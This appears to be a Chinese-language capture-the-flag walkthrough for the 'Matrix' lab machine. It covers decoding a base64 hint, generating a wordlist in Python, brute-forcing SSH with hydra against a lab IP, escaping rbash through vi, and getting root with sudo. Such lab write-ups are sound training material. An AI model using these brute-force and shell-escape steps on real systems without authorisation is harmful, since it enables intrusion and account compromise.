Machine_Matrix
信息搜集
存活检测
详细扫描
后台网页扫描
网页信息搜集
80 端口未发现有用信息
访问 nmap 扫描出的 http 31337 端口
在源码中发现了一串密文
ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
像是输出了一句话到 Cypher.matrix 文件中
禅师访问 Cypher.matrix 文件
You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
说可以用 guest 用户登录,密码是 k1ll0rXX
,但是少了最后两位
ssh 登录
编写 python 脚本,生成密码本
import string
all_chars = string.ascii_letters + string.digits
with open("./password.txt","w") as f:
for i in all_chars:
for j in all_chars:
f.writelines("k1ll0r" + i + j+"\n")
hydra 爆破 ssh
hydra -l guest -P password.txt ssh://10.4.7.162 -vV -f -I -t 64
成功爆破出密码
k1ll0r7n
ssh 登录
ssh guest@10.4.7.162
提权
sudo -l
查看 root 权限,受到 rbash 命令限制
按 Tab 键查看可使用的命令
vi 绕过 rbash 限制
# vim/vi进入之后
:set shell=/bin/sh # 或者用/bin/bash
# 将当前 shell 的默认 shell 设置为 /bin/sh
:shell
#
# 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
sudo -l 查看 root 权限
该用户拥有全部权限
直接 sudo bash
提权成功